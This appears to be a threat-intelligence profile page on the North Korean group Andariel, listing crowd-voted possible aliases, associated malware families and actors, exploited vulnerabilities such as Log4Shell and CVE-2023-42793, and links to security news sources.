Alias Description | Votes |
---|---|
Onyx Sleet is a possible alias for Andariel. Onyx Sleet, also known as Andariel, Silent Chollima, and Stonefly, is a North Korean state-sponsored cyber group under the RGB 3rd Bureau. This threat actor utilizes an array of malware to gather intelligence for North Korea, primarily conducting cyberespionage, but also engaging in ransomware activ | 6 |
Reconnaissance General Bureau is a possible alias for Andariel. The Reconnaissance General Bureau (RGB) is a North Korean intelligence agency known for its clandestine operations abroad. Its cyber activities, believed to be coordinated by the secretive organization, have been linked to various threat actors since at least 2014. Notable entities include the Beagl | 6 |
Lazarus Group is a possible alias for Andariel. The Lazarus Group, a notorious threat actor attributed to North Korea, is renowned for its malicious activities aimed at furthering the country's objectives. This group has been implicated in several high-profile cyber-attacks, including an attack in Spain known as Operation DreamJob. The exploitati | 5 |
Rgb is a possible alias for Andariel. RGB is a notorious threat actor, primarily associated with North Korea's Reconnaissance General Bureau (RGB), a military intelligence agency. This organization falls under the General Staff Bureau of the DPRK Korean People's Army and has been linked to numerous cyber-attacks against international en | 5 |
Stonefly is a possible alias for Andariel. Stonefly, also known as Andariel, Silent Chollima, Onyx Sleet, and APT45, is a threat actor group that has been active since at least 2015 and is believed to be linked to the North Korean government. The group has been involved in various attacks, including ransomware campaigns against Healthcare an | 4 |
Plutonium is a possible alias for Andariel. Plutonium, also known as Jumpy Pisces and Andariel, is a notable threat actor historically involved in cyberespionage, financial crime, and ransomware attacks. Recent reports indicate that this group has been breaching the IT systems of Sellafield, a site that holds the world's largest stockpile of | 3 |
Bluenoroff is a possible alias for Andariel. BlueNoroff, a threat actor group linked to North Korea, has been identified as the malicious entity behind several high-profile cyber-attacks. Since first making headlines with an attack on Sony Pictures in 2014, BlueNoroff and its parent group Lazarus have been involved in numerous notorious securi | 3 |
Silent Chollima is a possible alias for Andariel. Silent Chollima, also known as Stonefly or APT45, is a threat actor with links to North Korea's foreign intelligence agency, the 3rd Bureau of the Foreign Intelligence and Reconnaissance General Bureau. The group has been active since at least 2015, when it began shifting its objectives. Silent Chol | 3 |
Reconnaissance General Bureau Rgb is a possible alias for Andariel. The Reconnaissance General Bureau (RGB) of the Korean People's Army is a significant threat actor in global cybersecurity, housing various hacking groups under its control. These groups include well-known entities such as "Lazarus Group," "Bluenoroff," and "Andariel," identified by Executive Order 1 | 3 |
ZINC is a possible alias for Andariel. Zinc, also known as Diamond Sleet, is a North Korea-based threat actor group that has been active since 2009. This group is notorious for its cyber-attacks aimed at collecting political, military, and economic intelligence on North Korea's foreign adversaries, and executing currency generation campa | 2 |
Jumpy Pisces is a possible alias for Andariel. Jumpy Pisces, a North Korean state-sponsored malware group, has been identified as a key player in an unprecedented collaboration with an underground ransomware network. This marks a significant development in the cybersecurity landscape, as it's the first recorded instance of such cooperation betwe | 2 |
APT38 is a possible alias for Andariel. APT38, a threat actor suspected to be backed by the North Korean regime, has been responsible for some of the largest cyber heists observed to date. The group has conducted operations in over 16 organizations across at least 11 countries, primarily targeting financial institutions worldwide. Despite | 2 |
Alias Description | Association Type | Votes |
---|---|---|
The Dtrack Malware is associated with Andariel. DTrack is a malicious software (malware) known for its data theft capabilities. It was first associated with North Korean threat groups and has been used in numerous cyber attacks globally. The malware infiltrates systems through suspicious downloads, emails, or websites, and once inside, it collect | Unspecified | 3 |
The Collectionrat Malware is associated with Andariel. CollectionRAT is a malicious software (malware) first identified in a Cisco Talos report in 2023, with samples dating as far back as 2021. This Windows-based Remote Access Trojan (RAT) is believed to be connected to the Jupiter/EarlyRAT malware family, which has previously been linked to a Lazarus s | Unspecified | 2 |
The Earlyrat Malware is associated with Andariel. EarlyRat is a previously undocumented malware discovered by Kaspersky researchers in June. The North Korea-linked Advanced Persistent Threat (APT) group Andariel used EarlyRat in attacks exploiting the Log4j Log4Shell vulnerability last year. The malware was first noticed in one of the Log4j cases, | Unspecified | 2 |
The Ninerat Malware is associated with Andariel. NineRAT is a malicious software, or malware, that was first built in May 2022 and initially used in the Operation Blacksmith campaign against a South American agricultural organization in March. It is one of two Remote Access Trojans (RATs) utilized by Lazarus, a notorious Advanced Persistent Threat | Unspecified | 2 |
Alias Description | Association Type | Votes |
---|---|---|
The Kimsuky Threat Actor is associated with Andariel. Kimsuky is a threat actor group linked to North Korea, known for its malicious cyber activities with a particular focus on espionage. The group has been observed employing a variety of sophisticated tactics and techniques, including the use of malware such as TOGREASE, GREASE, and RandomQuery, which | Unspecified | 5 |
The temp.hermit Threat Actor is associated with Andariel. Temp.Hermit, also known as Selective Pisces or Diamond Sleet, is a cyber threat actor linked to North Korea. This group has been active since 2013 and targets governments, defense, telecommunications, and financial services sectors with cyberespionage operations. Temp.Hermit's activities often overl | Unspecified | 2 |
Alias Description | Association Type | Votes |
---|---|---|
The Log4Shell Vulnerability is associated with Andariel. Log4Shell is a significant software vulnerability (CVE-2021-44228, CVE-2021-45046, and CVE-2021-45105) that exists in the Log4j Java-based logging utility. It was exploited by various Advanced Persistent Threat (APT) actors, including LockBit affiliates and GOLD MELODY (UNC961), to gain unauthorized | Unspecified | 4 |
The CVE-2023-42793 Vulnerability is associated with Andariel. CVE-2023-42793 is a critical security vulnerability identified in JetBrains TeamCity build management and continuous integration server. This flaw, characterized by an authentication bypass, was exploited by multiple threat actors throughout 2023 and into 2024. The first notable exploitation occurre | Unspecified | 4 |
Preview | Source Link | CreatedAt | Title |
---|---|---|---|
DARKReading | a month ago | ||
DARKReading | 2 months ago | ||
Unit42 | 2 months ago | ||
DARKReading | 2 months ago | ||
Unit42 | 3 months ago | ||
InfoSecurity-magazine | 4 months ago | ||
Securityaffairs | 5 months ago | ||
DARKReading | 5 months ago | ||
DARKReading | 5 months ago | ||
Flashpoint | 5 months ago | ||
CISA | 5 months ago | ||
CISA | 5 months ago | ||
DARKReading | 7 months ago | ||
Securityaffairs | 7 months ago | ||
Securelist | 7 months ago | ||
Checkpoint | 8 months ago | ||
DARKReading | 8 months ago | ||
InfoSecurity-magazine | 8 months ago | ||
Securityaffairs | 8 months ago | ||
CERT-EU | 10 months ago |